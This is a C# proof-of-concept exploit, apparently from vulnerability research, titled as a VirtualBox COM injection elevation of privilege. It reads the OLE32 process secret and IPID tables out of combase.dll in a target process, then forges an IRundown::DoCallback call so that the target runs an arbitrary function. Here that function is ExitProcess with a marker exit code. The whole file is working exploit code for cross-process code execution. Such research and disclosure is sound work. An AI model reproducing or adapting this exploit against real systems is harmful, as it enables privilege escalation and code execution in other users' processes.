﻿using NtApiDotNet;
using NtApiDotNet.Win32;
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
using System.Text;

namespace PoC_VirtualBoxComInjection_EoP
{
    class ProcessReader : IDisposable
    {
        static readonly Dictionary<string, long> _symbol_cache = new Dictionary<string, long>() {
            {"combase!CProcessSecret::s_fSecretInit",0x2DDFC4},
            {"combase!CProcessSecret::s_guidOle32Secret",0x2DDA00},
            {"CIPIDTable::_palloc",0x2DD890},
            {"combase!g_pMTAEmptyCtx",0x2DDA28},
        };

        const string COMBASE_MD5 = "bCiVGCbLMzmjICJGlmiPJw==";

        private readonly NtProcess _process;
        private readonly long _combase_addr;
        private readonly ISymbolResolver _resolver;

        public long GetProcessPeb()
        {
            return _process.PebAddress.ToInt64();
        }

        public long GetSymbolAddress(string name)
        {
            if (_resolver != null)
            {
                _resolver.GetAddressOfSymbol(name).ToInt64();
            }
            return _symbol_cache[name] + _combase_addr;
        }

        public long GetThreadTeb(uint thread_id)
        {
            using (var thread = NtThread.Open((int)thread_id, ThreadAccessRights.QueryLimitedInformation))
            {
                return thread.TebBaseAddress.ToInt64();
            }
        }

        public T[] ReadArray<T>(long address, int count) where T : struct
        {
            return _process.ReadMemoryArray<T>(address, count);
        }

        public byte[] ReadMemory(string name, int count)
        {
            return ReadMemory(GetSymbolAddress(name), count);
        }

        public byte[] ReadMemory(long address, int count)
        {
            return _process.ReadMemory(address, count);
        }

        public T ReadStruct<T>(long address) where T : struct
        {
            return _process.ReadMemory<T>(address);
        }

        public T ReadStruct<T>(string name) where T : struct
        {
            return ReadStruct<T>(GetSymbolAddress(name));
        }

        public string ReadUnicodeStringZ(long address)
        {
            StringBuilder builder = new StringBuilder();
            char c = ReadStruct<char>(address);
            while (c != 0)
            {
                builder.Append(c);
                address += 2;
                c = ReadStruct<char>(address);
            }
            return builder.ToString();
        }

        public void Dispose()
        {
            _resolver?.Dispose();
            _process?.Dispose();
        }

        public int WaitForExit()
        {
            if (_process.Wait(10) != NtStatus.STATUS_SUCCESS)
            {
                throw new ArgumentException("Target process didn't exit");
            }
            return _process.ExitStatus;
        }

        public ProcessReader(uint pid, string symbol_path)
        {
            using (var lib = SafeLoadLibraryHandle.GetModuleHandle("combase.dll"))
            {
                string hash = Convert.ToBase64String(MD5.Create().ComputeHash(File.ReadAllBytes(lib.FullPath)));
                if (hash != COMBASE_MD5)
                {
                    Console.WriteLine("COMBASE hash doesn't match {0}. Fallback to using symbol resolver.", hash);
                    _resolver = SymbolResolver.Create(_process, "dbghelp.dll", symbol_path);
                }
                _combase_addr = lib.DangerousGetHandle().ToInt64();
            }

            _process = NtProcess.Open((int)pid, ProcessAccessRights.VmRead | ProcessAccessRights.QueryLimitedInformation | ProcessAccessRights.Synchronize);
            if (_process.Is64Bit != Environment.Is64BitProcess)
            {
                throw new ArgumentException("Mismatched process bitness");
            }
        }
    }

    [StructLayout(LayoutKind.Sequential)]
    class XAptCallback
    {
        /* Offset: 0 */
        public ulong pfnCallback;
        /* Offset: 8 */
        public ulong pParam;
        /* Offset: 16 */
        public ulong pServerCtx;
        /* Offset: 24 */
        public ulong pUnk;
        /* Offset: 32 */
        public Guid iid;
        /* Offset: 48 */
        public int iMethod;
        /* Offset: 52 */
        public Guid guidProcessSecret;
    };

    [Guid("00000134-0000-0000-c000-000000000046")]
    [InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
    interface IRundown
    {
        void RemQueryInterface();
        void RemAddRef();
        void RemRelease();
        void RemQueryInterface2();
        void RemChangeRef();
        [PreserveSig]
        IntPtr DoCallback(/* Stack Offset: 8 */ [In] XAptCallback p0);
        void DoNonreentrantCallback(/* Stack Offset: 8 */ [In] XAptCallback p0);
        void AcknowledgeMarshalingSets();
        void GetInterfaceNameFromIPID();
        void RundownOid();
    }

    static class Program
    {
        static Guid ReadOle32Secret(ProcessReader client)
        {
            int init = client.ReadStruct<byte>("combase!CProcessSecret::s_fSecretInit");
            if (init == 0)
            {
                throw new Exception("Process secret doesn't seem to be initialized");
            }

            return new Guid(client.ReadMemory("combase!CProcessSecret::s_guidOle32Secret", 16));
        }

        class COMIPIDEntry
        {
            public Guid Ipid { get; private set; }
            public Guid Iid { get; private set; }
            public Guid Oxid { get; private set; }

            private static uint GetApartmentIdFromIPid(Guid ipid)
            {
                return BitConverter.ToUInt16(ipid.ToByteArray(), 6);
            }

            public uint ApartmentId { get { return GetApartmentIdFromIPid(Ipid); } }
            public bool IsSta { get { uint appid = ApartmentId; return appid > 0 && appid < 0xFFFF; } }

            public byte[] ToObjref()
            {
                MemoryStream stm = new MemoryStream();
                BinaryWriter writer = new BinaryWriter(stm);
                writer.Write(Encoding.ASCII.GetBytes("MEOW"));
                writer.Write(1);
                writer.Write(Iid.ToByteArray());
                writer.Write(0);
                writer.Write(1);
                writer.Write(Oxid.ToByteArray(), 0, 8);
                RandomNumberGenerator rng = RandomNumberGenerator.Create();
                byte[] oid = new byte[8];
                rng.GetBytes(oid);
                writer.Write(oid);
                writer.Write(Ipid.ToByteArray());
                writer.Write(0);
                return stm.ToArray();
            }

            public COMIPIDEntry(Guid ipid, Guid iid, Guid oxid)
            {
                Ipid = ipid;
                Iid = iid;
                Oxid = oxid;
            }
        }

        [StructLayout(LayoutKind.Sequential)]
        struct PageEntry
        {
            public IntPtr pNext;
            public int dwFlag;
        };

        interface IPageAllocator
        {
            int Pages { get; }
            int EntrySize { get; }
            int EntriesPerPage { get; }
            IntPtr[] ReadPages(ProcessReader client);
        }

        [StructLayout(LayoutKind.Sequential)]
        struct CInternalPageAllocator : IPageAllocator
        {
            public int _cPages;
            public IntPtr _pPageListStart;
            public IntPtr _pPageListEnd;
            public int _dwFlags;
            public PageEntry _ListHead;
            public IntPtr _cEntries;
            public IntPtr _cbPerEntry;
            public ushort _cEntriesPerPage;
            public IntPtr _pLock;

            int IPageAllocator.Pages
            {
                get
                {
                    return _cPages;
                }
            }

            int IPageAllocator.EntrySize
            {
                get
                {
                    return _cbPerEntry.ToInt32();
                }
            }

            int IPageAllocator.EntriesPerPage
            {
                get
                {
                    return _cEntriesPerPage;
                }
            }

            IntPtr[] IPageAllocator.ReadPages(ProcessReader client)
            {
                return client.ReadArray<IntPtr>(_pPageListStart.ToInt64(), _cPages);
            }
        };

        [StructLayout(LayoutKind.Sequential)]
        struct CPageAllocator
        {
            public CInternalPageAllocator _pgalloc;
            public IntPtr _hHeap;
            public int _cbPerEntry;
            public int _lNumEntries;
        }

        private class PageAllocator
        {
            public IntPtr[] Pages { get; private set; }
            public int EntrySize { get; private set; }
            public int EntriesPerPage { get; private set; }

            public PageAllocator(ProcessReader client, long ipid_table)
            {
                IPageAllocator page_alloc = client.ReadStruct<CInternalPageAllocator>(ipid_table);
                Pages = page_alloc.ReadPages(client);
                EntrySize = page_alloc.EntrySize;
                EntriesPerPage = page_alloc.EntriesPerPage;
            }
        }

        internal interface IOXIDEntry
        {
            int Pid { get; }
            int Tid { get; }
            Guid MOxid { get; }
            long Mid { get; }
            IntPtr ServerSTAHwnd { get; }
        }

        [StructLayout(LayoutKind.Sequential)]
        struct COMVERSION
        {
            public ushort MajorVersion;
            public ushort MinorVersion;
        }

        [StructLayout(LayoutKind.Sequential)]
        struct OXIDEntryNative : IOXIDEntry
        {
            public IntPtr _pNext;
            public IntPtr _pPrev;
            public int _dwPid;
            public int _dwTid;
            public Guid _moxid;
            public long _mid;
            public Guid _ipidRundown;
            public int _dwFlags;
            public IntPtr _hServerSTA;
            public IntPtr _pParentApt;
            public IntPtr _pSharedDefaultHandle;
            public IntPtr _pAuthId;
            public IntPtr _pBinding;
            public int _dwAuthnHint;
            public int _dwAuthnSvc;
            public IntPtr _pMIDEntry;
            public IntPtr _pRUSTA;
            public int _cRefs;
            public IntPtr _hComplete;
            public int _cCalls;
            public int _cResolverRef;
            public int _dwExpiredTime;
            public COMVERSION _version;
            public IntPtr _pAppContainerServerSecurityDescriptor;
            public int _ulMarshaledTargetInfoLength;
            public IntPtr _pMarshaledTargetInfo;
            public IntPtr _pszServerPackageFullName;
            public Guid _guidProcessIdentifier;

            int IOXIDEntry.Pid
            {
                get
                {
                    return _dwPid;
                }
            }

            int IOXIDEntry.Tid
            {
                get
                {
                    return _dwTid;
                }
            }

            Guid IOXIDEntry.MOxid
            {
                get
                {
                    return _moxid;
                }
            }

            long IOXIDEntry.Mid
            {
                get
                {
                    return _mid;
                }
            }

            IntPtr IOXIDEntry.ServerSTAHwnd
            {
                get
                {
                    return _hServerSTA;
                }
            }
        }

        internal interface IPIDEntryNativeInterface
        {
            uint Flags { get; }
            IntPtr Interface { get; }
            IntPtr Stub { get; }
            Guid Ipid { get; }
            Guid Iid { get; }
            int StrongRefs { get; }
            int WeakRefs { get; }
            int PrivateRefs { get; }
            IOXIDEntry GetOxidEntry(ProcessReader client);
        }

        [StructLayout(LayoutKind.Sequential)]
        struct IPIDEntryNative : IPIDEntryNativeInterface
        {
            public IntPtr pNextIPID;
            public uint dwFlags;
            public int cStrongRefs;
            public int cWeakRefs;
            public int cPrivateRefs;
            public IntPtr pv;
            public IntPtr pStub;
            public IntPtr pOXIDEntry;
            public Guid ipid;
            public Guid iid;
            public IntPtr pChnl;
            public IntPtr pIRCEntry;
            public IntPtr pOIDFLink;
            public IntPtr pOIDBLink;

            uint IPIDEntryNativeInterface.Flags
            {
                get
                {
                    return dwFlags;
                }
            }

            IntPtr IPIDEntryNativeInterface.Interface
            {
                get
                {
                    return pv;
                }
            }

            IntPtr IPIDEntryNativeInterface.Stub
            {
                get
                {
                    return pStub;
                }
            }

            Guid IPIDEntryNativeInterface.Ipid
            {
                get
                {
                    return ipid;
                }
            }

            Guid IPIDEntryNativeInterface.Iid
            {
                get
                {
                    return iid;
                }
            }

            int IPIDEntryNativeInterface.StrongRefs
            {
                get
                {
                    return cStrongRefs;
                }
            }

            int IPIDEntryNativeInterface.WeakRefs
            {
                get
                {
                    return cWeakRefs;
                }
            }

            int IPIDEntryNativeInterface.PrivateRefs
            {
                get
                {
                    return cPrivateRefs;
                }
            }

            IOXIDEntry IPIDEntryNativeInterface.GetOxidEntry(ProcessReader client)
            {
                return client.ReadStruct<OXIDEntryNative>(pOXIDEntry.ToInt64());
            }
        };

        static List<COMIPIDEntry> ParseIPIDEntries(ProcessReader client)
        {
            List<COMIPIDEntry> entries = new List<COMIPIDEntry>();
            PageAllocator palloc = new PageAllocator(client, client.GetSymbolAddress("CIPIDTable::_palloc"));
            if (palloc.Pages.Length == 0 || palloc.EntrySize < Marshal.SizeOf(typeof(IPIDEntryNative)))
            {
                return entries;
            }

            foreach (IntPtr page in palloc.Pages)
            {
                int total_size = palloc.EntriesPerPage * palloc.EntrySize;
                var data = client.ReadMemory(page.ToInt64(), palloc.EntriesPerPage * palloc.EntrySize);
                if (data.Length < total_size)
                {
                    continue;
                }

                using (var buf = new SafeHGlobalBuffer(data))
                {
                    for (int entry_index = 0; entry_index < palloc.EntriesPerPage; ++entry_index)
                    {
                        IPIDEntryNativeInterface ipid_entry = buf.Read<IPIDEntryNative>((ulong)(entry_index * palloc.EntrySize));
                        if ((ipid_entry.Flags != 0xF1EEF1EE) && (ipid_entry.Flags != 0))
                        {
                            try
                            {
                                IOXIDEntry oxid = ipid_entry.GetOxidEntry(client);
                                entries.Add(new COMIPIDEntry(ipid_entry.Ipid, ipid_entry.Iid, oxid.MOxid));
                            }
                            catch
                            {
                            }
                        }
                    }
                }
            }

            return entries;
        }

        static IntPtr GetFunctionAddress(string dllname, string name)
        {
            using (SafeLoadLibraryHandle lib = SafeLoadLibraryHandle.LoadLibrary(dllname))
            {
                IntPtr ret = lib.GetProcAddress(name);
                if (ret == IntPtr.Zero)
                {
                    throw new ArgumentException($"Couldn't find {name} in {dllname}");
                }
                return ret;
            }
        }

        [StructLayout(LayoutKind.Sequential)]
        struct UNICODE_STRING
        {
            public ushort Length;
            public ushort MaximumLength;
            public UIntPtr Buffer;
        }

        static string GetSymbolPath()
        {
            string path = Environment.GetEnvironmentVariable("_NT_SYMBOL_PATH");
            if (!string.IsNullOrWhiteSpace(path))
            {
                return path;
            }
            return Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.CommonApplicationData), "dbg", "sym");
        }

        const int EXPECTED_EXIT_CODE = 12345678;

        static void Main(string[] args)
        {
            try
            {
                if (args.Length < 1)
                {
                    Console.WriteLine("Usage: poc PID");
                    return;
                }

                using (ProcessReader client = new ProcessReader(uint.Parse(args[0]), GetSymbolPath()))
                {
                    Guid secret = ReadOle32Secret(client);
                    Console.WriteLine("Secret: {0}", secret);
                    Guid irundown_iid = new Guid("00000134-0000-0000-c000-000000000046");
                    var ipids = ParseIPIDEntries(client).Where(i => i.Iid == irundown_iid && i.IsSta).ToList();
                    foreach (var ipid in ipids)
                    {
                        Console.WriteLine("{0} - {1} - {2}", ipid.Ipid, ipid.Iid, ipid.Oxid);
                    }

                    if (ipids.Count == 0)
                    {
                        throw new Exception("No IRundown IPIDs found");
                    }

                    ulong context = (ulong)(client.ReadStruct<IntPtr>("combase!g_pMTAEmptyCtx").ToInt64());
                    IRundown rundown = (IRundown)Marshal.BindToMoniker($"objref:{Convert.ToBase64String(ipids[0].ToObjref())}:");
                    IntPtr func = GetFunctionAddress("kernel32.dll", "ExitProcess");

                    XAptCallback callback = new XAptCallback()
                    {
                        guidProcessSecret = secret,
                        pServerCtx = context,
                        pfnCallback = (ulong)func.ToInt64(),
                        pParam = EXPECTED_EXIT_CODE
                    };
                    Console.WriteLine("Result: {0:X}", rundown.DoCallback(callback).ToInt64());
                    if (client.WaitForExit() == EXPECTED_EXIT_CODE)
                    {
                        Console.WriteLine("Success");
                    }
                    else
                    {
                        Console.WriteLine("Error, exit code doesn't match expected");
                    }
                }
            }
            catch (Exception ex)
            {
                Console.WriteLine(ex);
            }
        }
    }
}
